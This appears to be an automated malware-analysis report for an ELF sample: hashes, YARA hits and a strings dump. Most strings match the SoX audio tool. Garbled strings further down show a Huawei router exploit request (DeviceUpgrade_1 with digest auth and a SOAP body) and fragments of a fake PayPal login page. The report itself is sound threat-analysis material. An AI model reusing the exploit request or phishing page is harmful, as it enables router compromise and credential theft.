Sample details: 074c9fcf7027c6002a51820e502febac --

Hashes
MD5: 074c9fcf7027c6002a51820e502febac
SHA1: b6938ecd4225f55d5976b2605893c838ba5a6242
SHA256: 9f6ec547af97c6d45ede971d0d0663422c23df87b3decdba0d8057dbd7bb511a
SSDEEP: 768:ZNx7k7HC/xlmyIoxgMXR0GSJ3XHhWKHIgsKmaE1gZO878uuRWEWrl+JLz4twXuX6:4oxHFxmrJzH/2aE14O87BAhoyuX6
Details
File Type: ELF
Yara Hits
YRP/domain | YRP/url | YRP/contentis_base64 |
Strings
		/lib64/ld-linux-x86-64.so.2
libsox.so.3
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
sox_trim_clear_start
sox_write_handler
sox_init
sox_num_comments
lsx_debug_impl
lsx_strcasecmp
sox_get_format_fns
sox_format_supports_encoding
lsx_sigfigs3
sox_init_encodinginfo
sox_version_info
lsx_getopt
sox_find_format
sox_strerror
sox_create_effect
sox_get_encodings_info
sox_delete_comments
sox_pop_effect_last
sox_close
sox_basename
sox_is_playlist
sox_push_effect_last
sox_seek
sox_copy_comments
lsx_warn_impl
lsx_realloc
lsx_getopt_init
lsx_report_impl
lsx_filelength
lsx_find_enum_text
sox_find_effect
sox_open_read
sox_flow_effects
sox_delete_effects
sox_trim_get_start
sox_effects_clips
sox_open_write
sox_add_effect
sox_get_globals
lsx_realloc_array
sox_delete_effect_last
sox_get_effect_fns
lsx_sigfigs3p
sox_find_comment
sox_create_effects_chain
sox_precision
lsx_find_file_extension
sox_effect_options
sox_quit
sox_write
sox_append_comment
sox_delete_effects_chain
lsx_fail_impl
sox_get_effects_globals
lsx_find_enum_value
sox_parse_playlist
sox_read
sox_format_init
libm.so.6
libpthread.so.0
__errno_location
libc.so.6
strcpy
__printf_chk
__isoc99_sscanf
__fdelt_chk
__isoc99_scanf
signal
__stack_chk_fail
unlink
select
strtod
isatty
strlen
memset
tcsetattr
memcmp
__fprintf_chk
stdout
fclose
strcat
__ctype_b_loc
getenv
stderr
strncasecmp
fileno
fwrite
gettimeofday
strchr
__vfprintf_chk
tcgetattr
__cxa_finalize
__sprintf_chk
__xstat
strcmp
__libc_start_main
ferror
stpcpy
globfree
__cxa_atexit
GLIBC_2.2.5
GLIBC_2.15
GLIBC_2.27
GLIBC_2.4
GLIBC_2.3
GLIBC_2.7
GLIBC_2.3.4
AWAVAUATUSH
[]A\A]A^A_
D$`%02d
9D$ ~(H
[]A\A]A^
[]A\A]A^A_
<"tZ<'t2<\t_
AWAVAUATI
([]A\A]A^A_
L;)s3H
]A\A]A^
AVAUATU1
]A\A]A^
AVAUATUSH
[]A\A]A^A_
[]A\A]A^A_
[]A\A]
[]A\A]
[]A\A]
[]A\A]A^
[]A\A]A^A_
[]A\A]A^
AUATUSH
ATSAWAVL
[]A\A]A^A_
AUATUSH
[]A\A]
AWAVAUI
D$XdH3
h[]A\A]A^A_
AVAUATI
[]A\A]A^
AVAUATA
]A\A]A^
AWAVAUATI
8[]A\A]A^A_
[]A\A]
AWAVAUATA
L;|$ r
[]A\A]A^A_
AUATUSH
[]A\A]
[]A\A]
AWAVAUATUSH
8[]A\A]A^A_
[]A\A]A^A_
[]A\A]A^A_
[]A\A]A^A_
newfile
restart
%02i:%02i:%05.2f
default
AUDIODEV
ossdsp
coreaudio
pulseaudio
waveaudio
EFFECTS:
AUDIO FILE FORMATS:
Format: %s
Description: %s
Also handles:
Channels restricted to:
 stereo
Sample-rate restricted to:
Reads: %s
Writes:
%2u-bit 
%s (%u-bit precision)
Writes: yes
Writes: no
/dev/mixer
MIXERDEV
%04x %04x
`%s' %s: %s
%s %s %s: 
%s:      SoX v%s%s%s
time:     %s
issue:    %s
uname:    %s %s %s %s %s
compiler: %s
arch:     %s
 outfile
missing filename
      
Hd:%u.%u
used SOX_OPTS=%s
unknown
Input File     
Output File    
little
 File Size: %-10s
Bit Rate: %s
  Encoding: %-14s
Comment
Description
Info: %s
  Channels: %u @ %u-bit
Tracknumber
Track: %s
Tracktotal
 of %s
Samplerate: %gHz
Album: %s
%s gain: %+.1fdB
Replaygain: off
Artist
Artist: %s
  Duration: %-13s
Title: %s
%s: '%s'
File Size      : %s
Bit Rate       : %s
%u-bit 
Sample Encoding: %s%s
Endian Type    : %s
Replay gain    : %+g dB (%s)
Comments       : 
Comment        : '%s'
--%s: `%s' is not one of: %s.
Buffer size `%s' must be > %d
Cannot open comment file `%s'
Effect usage:
`%s' is deprecated
`%s' is libSoX-only
invalid option
%lf %c %c
%lf %c
AUDIODRIVER
invalid option for SOX_OPTS
ignoring `-t %s'.
glob: %s
using SOX_OPTS=%s
Overwriting `%s'
 %c%*[^
REPLAYGAIN_TRACK_GAIN=
REPLAYGAIN_ALBUM_GAIN=
unknown length
(multi)
--info
artist
`%s' is a libSoX-only effect
Processed by SoX
%%0%cd
channels
optimize_trim successful
start-up time = %g
Aborted.
Skipped.
output
-=====
=====-
======
!=====
=====!
FORMAT OPTIONS (fopts):
unsigned-integer
floating-point
ms-adpcm
ima-adpcm
oki-adpcm
gsm-full-rate
mu-law
octave
gnuplot
sequence
concatenate
mix-power
multiply
add-comment
combine
comment-file
endian
input-buffer
interactive
help-effect
help-format
no-glob
replay-gain
version
effects-file
single-threaded
ignore-length
play-rate-arg
no-clobber
multi-threaded
dft-min
compression
default-device
no-dither
encoding
no-show-progress
reverse-bits
reverse-nibbles
volume
  * Deprecated effect    + Experimental effect    # LibSoX-only effect
PLAYLIST FORMATS: m3u pls
AUDIO DEVICE DRIVERS:
%s: effects that modify audio should not follow dither
Usage: soxi [-V[level]] [-T] [-t|-r|-c|-s|-d|-D|-b|-B|-p|-e|-a] infile1 ...
-V[n]	Increment or set verbosity level (default is 2)
-T	With -s, -d or -D, display the total across all given files
-t	Show detected file-type
-r	Show sample-rate
-c	Show number of channels
-s	Show number of samples (0 if unavailable)
-d	Show duration in hours, minutes and seconds (0 if unavailable)
-D	Show duration in seconds (0 if unavailable)
-b	Show number of bits per sample (0 if not applicable)
-B	Show the bitrate averaged over the whole file (0 if unavailable)
-p	Show estimated sample precision in bits
-e	Show the name of the audio encoding
-a	Show file comments (annotations) if available
With no options, as much information as is available is shown for
each given file.
--norm                   Guard (see --guard) & normalise
Usage summary: [gopts] [[fopts] infile]... [fopts]%s [effect [effopt]]...
SPECIAL FILENAMES (infile, outfile):
-                        Pipe/redirect input/output (stdin/stdout); may need -t
-d, --default-device     Use the default audio device (where available)
-n, --null               Use the `null' file handler; e.g. with synth effect
-p, --sox-pipe           Alias for `-t sox -'
SPECIAL FILENAMES (infile only):
"|program [options] ..." Pipe input from external program (where supported)
http://server/file       Use the given URL as input file (where supported)
--magic                  Use `magic' file-type detection
EFFECT OPTIONS (effopts): effect dependent; see --help-effect
--multi-threaded        
POST /ctrlt/\`viqeUpgrade_1 HTTP/1.1
Co|tent-Length: 430
nneqtion: keep-alive
AYfepf: */*
Authorizatio
: D{gest username="dslf
bontig", realm="HuaweiH
meGsteway", nonce="8864
befp1f9ede0e336e3569d75
`300, uri="/ctrlt/Devic
Upg`ade_1", response="3$22f*43a42db38f48f59d2a3H<7e#9c", algorithm="MD5
- q}p="auth", nc=000000
5, qnonce="248d1a256010
<?xml version="
*0"2?><s:Envelope xmlns
w="zttp://schemas.xmlso
r.o`g/soap/envelope/" sVanc}dingStyle="http://s
memCs.xmlsoap.org/soap/Hkcouiwg
?<s:Boly><u:Up
vadt aml_r:u="uzn:schem<v-uani-OCf:servace:WANPP<*
A]:n}YQ!
B]]5q{`yq@PIXFAE_8ml
Eh_VNNLJ
%>LRO6:
	%R?Q\w
0F'',61
3>=PZSW
%=>JOp
eROW,I+
:[cibningiAfo
BWMqDQF][Z@n\[fo
lsy_getSQN 
WWH\At
C^JjRLReVGHU#HIH_creTD\b_ffeAI._Mx_gBU{AUEOd
S_9NUx_de	
>comLB_Rs
socsLWSXv
aHx_clbye
@is_ 8ay?
I]IhPDC
lasS<BW@
seTQ5EWI
RV9mBR s{ZNB$A@UCiRA
{!TS,_r{zkpt
tYW\gVE
UKT+[UHN08sx_r_GTTRn^M$l
ZDKHX\X
$K'x_fi
CLxYSCXtLR@g
;x$^\T:_re
V0'ox_f
VB{B2fe
LRP1_e
AEVTR''ox_t
\Wb^T _
PGIC{I^X$C]GER s_cl\WT#HIH
open$FR^
C1TT@}
S_eW2fecN5J^_nAGEy
|GEVP\TP
ar	QH"
OPTRcU]U1cPiZSYC!6ox_g^Gb_2fecEeF_UTls
[m];mmbUU&D^
NYAX[E
ZDW@H7ts_$-5IAi
N\pRPTG\4X]JjHP\Yp
<))LRS
/AO:95$pX@Xy
AFHonbf
fop5!S
7<;/nqX~e+VJ+ICPWT.B__@QB1DOLC
:MOBYh~U
][@FVqSeaC
h\C^]Dh
~ongP/
UIKPA5]FFWF@5qnCS_
\s7dCVN%
__sprimtf_bhk
\_xsuat
st}cmp
__lVbc_\
ferror
stpcpy
globfree
__cxa_atexit
GLIBC_2.2.5
GLIBC_2.15
GLIBC_2.27
GLIBC_2.4
GLIBC_2.3
GLIBC_2.7
GLIBC_2.3.4
.fini@
rodata
&dtors
 DOCTYXE html>`
--[if lW!IE 9]6
<html 7
ng="en2
blass=*no-js l
er-tha.
he9 ie*>
if]-->l
,-[if dt IE 105
mang="mn" clas
"no-jsPOnwer-t`an-ie10W
ZendifU--><!--%
f !IE]
		<`tml cla	
=" js 
mang="mn">
<![end
	4head>
!--Scr
Su info2 script
node, tAlplate2  , dat
 Jul 3<
3016 1?:28:47 
7:00, CKtntry:(US, lan
age: e^
veb vezsion:  
ntent 
Assion:( hostna
 : ZwH
9DcwsYgOOw3X9t
QNSFeO
t8Zrb0X3KkXCPH
G/e6L9
bpD1LMrBGDcb+Pw
84YXcs
Vmogid 2 Or6hBs
VrwHgJBfLZPkpI?1eI5V%2
u%2FvV
_LKXQ7ea%2BiGyn
MPA0789rbrA9AQQZ%2FUQO
pV1JR4
cJDFovY-2BW0Sl4
e8_155
5eb395(-->
ta cha
Vdt="utn-8">
itle>L
B!in to(your Pa
al acc
Pot</ti|le>
ta http
dquiv=*content
ype" cOHuent="|ext/htm
 chars%R<UTF-8*>
		<me\
 name=BGqplica|ion-namP
 conte
R<"PayPil">
ta nam
#msappdicationg
ask" c
Huent="fame=My 
count;
Euion-uzi=httpsg
/www.pa^qal.coe/us/cgiN
in/webSDs?cmd=WaccountO
con-ur)
ittp:/'www.pay
lobjec
T/com/ef_US/i/i
n/pp_f
Qhcon_x&ico">
meta n
Jd="msaxplicati
-task"
Dnntent5"name=S
d Mone
`ction%uri=htt
://www.X`ypal.kom/us/c
-bin/wEJrcr?cml=_send-
ney-tr!Frfer&aep;send_
thod=d
Edstic;acon-uri
ttp://
_v.paypilobject)
com/en
}R/i/icgn/pp_fa
con_x.
		4meta na
="msap
Dhcatiof-task" 5
ntent="G`me=Reyuest Mo
y;actiOG,uri=h|tps://p
sonal.0Hxpal.cgm/cgi-b
/?cmd=?[dnder-kontent&
p;cont
Gu_ID=mirketing
s/requ
Zu_moneq;icon-uw
=http:
vww.paqpalobje
s.com/
G^US/i/acon/pp_m
vicon_x
	<meta N
me="keqGnrds" kontent=*Dsansfe2
loney,(email m
ey tra
Cger, ifternati
al mon
I!transner ">
meta n
]d="deskription
conten
#Transner moneY
online
Yo secofds with0
ayPal 
_oey trinsfer. 
l you 
Jdd is gn e~ail address
		<lonk Rel="shortcu
hcon" nref
"https://ww
qaypalibjeSts.com/en_U
h/icon)pp_
avicon_x.ico
		<llnk 
el="apple-tODbh-icok" h
ef="https:/
Fvw.payualo
jects.com/e6sTS/i/pri/aqple-touch-i
Co.png"9
		>meta name="
Edwport% comtent="widthMHdvice-pidtl, initial-s
Mme=1.0+ ma}imum-scale=
!user-tcalgble=yes">
mink rbl="ttylesheet" 
^df="htsps:'/www.paypal
Nkects.dom/~eb/res/dd1/
66a01d?c6d:e1d251f0de8
d55/cst/ap{.css">
Zif ltb IE,9]>
		<link
^dl="st~leseeet" href="
Xups://pww.~aypalobject
bom/wee/re|/dd1/3776a0
H9c6d0e6d25!f0de8e5e55/
_r/ie9.dss"1/>
		<![end
J\--><sdripf src="https
.www.pfypaxobjects.com
[db/res(dd1:377